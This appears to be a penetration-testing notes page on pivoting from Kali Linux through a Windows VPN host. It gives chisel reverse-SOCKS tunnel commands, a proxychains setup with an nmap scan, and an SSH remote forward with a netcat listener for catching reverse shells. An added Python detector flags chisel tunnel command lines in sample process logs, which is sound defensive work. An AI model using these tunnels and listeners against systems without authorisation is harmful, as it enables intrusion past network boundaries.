# Pivot in a Case

Use this when the VPN to the target machine runs only on a Windows machine and you want to attack from Kali Linux.

1. Start the Windows machine and establish the VPN connection. Make sure you can access the target machine.
2. Set up a Host-Only connection between the Windows machine and the Kali machine. Make sure you can communicate with the Kali machine.
3. Upload chisel.exe to the Windows machine, and install chisel on Kali.
4. Set up the chisel server on the Kali machine:

```bash
chisel server -p 9090 --reverse
```

<figure><img src="https://1855963211-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FaDjlLLsWaat1v8p89kgM%2Fuploads%2FH5hEYo39hFd3pIPZTvLt%2Fimage.png?alt=media&#x26;token=1c354b86-aba8-478a-bfc5-092b56bbdfd4" alt=""><figcaption></figcaption></figure>

5. Then connect to the chisel server from the Windows machine.

```
.\chisel.exe client <ip kali machine>:9090 R:socks
```

6. Set a **socks5** proxy in `/etc/proxychains.conf`:

<pre><code>[ProxyList]
socks5 127.0.0.1 <a data-footnote-ref href="#user-content-fn-1">1080</a>
</code></pre>

7. Test the connection. <mark style="color:red;">**Important**</mark>: *Traffic sent through this tunnel carries the Windows machine's IP as its source IP, so ping does not work, because the Kali machine can't receive the ICMP packet. When you run nmap, always use `-Pn` to skip the ping-based host discovery.*

```bash
proxychains nmap -Pn <target machine behind the windows machine>
```
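Seen from the defender's side, the tunnel built in steps 4 and 5 leaves a recognisable command line. The following is an added example (not from the original page or from the chisel project) that flags process command lines shaped like a chisel reverse tunnel, matching on the arguments rather than the executable name. The event tuples, host names and the 192.0.2.10 address are constructed sample data, and `classify` and `scan` are hypothetical helper names.

```python
import re
import shlex

# Constructed process-creation records (host, command line); not real telemetry.
SAMPLE_EVENTS = [
    ("WIN-JUMP", r".\chisel.exe client 192.0.2.10:9090 R:socks"),
    ("WIN-JUMP", r"C:\Users\Public\svc.exe client 192.0.2.10:9090 R:1080:socks"),
    ("KALI", "chisel server -p 9090 --reverse"),
    ("WIN-JUMP", r"C:\Windows\System32\ping.exe 192.0.2.10"),
    ("WIN-JUMP", r"git.exe client R:notes"),
]

# host:port of the tunnel server, optionally with an http(s):// scheme
SERVER_ADDR = re.compile(r"^(https?://)?[\w.\-]+:\d{1,5}$")
# reverse remote: R:socks, R:1080:socks, R:2222:localhost:22, optional /tcp or /udp
REVERSE_REMOTE = re.compile(r"^R:(?:[^\s:]+:){0,3}(socks|\d{1,5})(/(tcp|udp))?$")

def classify(cmdline):
    """Return 'reverse-client', 'reverse-server' or None for one command line."""
    try:
        args = shlex.split(cmdline, posix=False)  # keep Windows backslashes
    except ValueError:                            # unbalanced quotes
        args = cmdline.split()
    rest = args[1:]                               # executable name is ignored on purpose
    if "client" in rest:
        after = rest[rest.index("client") + 1:]
        positional = [a for a in after if not a.startswith("-")]
        for i, tok in enumerate(positional):
            if SERVER_ADDR.match(tok) and not tok.startswith("R:"):
                if any(REVERSE_REMOTE.match(r) for r in positional[i + 1:]):
                    return "reverse-client"
    # Heuristic: other tools may also accept "server --reverse"
    if "server" in rest and "--reverse" in rest:
        return "reverse-server"
    return None

def scan(events):
    """Return (host, verdict, cmdline) for every event that matches."""
    hits = []
    for host, cmd in events:
        verdict = classify(cmd)
        if verdict:
            hits.append((host, verdict, cmd))
    return hits

if __name__ == "__main__":
    for host, verdict, cmd in scan(SAMPLE_EVENTS):
        print(f"{host:9} {verdict:15} {cmd}")
```
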

How to set up a reverse shell?

ref: <https://www.youtube.com/watch?v=mOuqPROMmZc>

You need another forward proxy from the Windows machine to the Kali machine.

There are 2 options, depending on the middle machine.\
Linux machine with SSH:

```
ssh -R <middle machine IP>:<port>:127.0.0.1:<listen port> user_middle@<middle machine IP>
ssh -R <middle machine IP>:443:127.0.0.1:8080 user_middle@<middle machine IP>
```

Your reverse shell:

```
host:<middle machine IP>
port: 443
```

Netcat listener for the shell:

```
nc -lvnp 8080
```

How about setting up Burp Suite?

ref: <https://www.youtube.com/watch?v=Q5ujOEXGOo8>

Requirement:\
1\. A tunnel connection with `socks5 127.0.0.1 9666` --> use chisel as above

<figure><img src="https://1855963211-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FaDjlLLsWaat1v8p89kgM%2Fuploads%2Fw4WYUwQffgvf7QWhkDxe%2Fimage.png?alt=media&#x26;token=23bed077-4a2d-43f3-985f-a60affae79e5" alt=""><figcaption></figcaption></figure>

2. Set your browser proxy to the Burp proxy
3. Just let it go :D

[^1]: This port appears in the chisel server output.

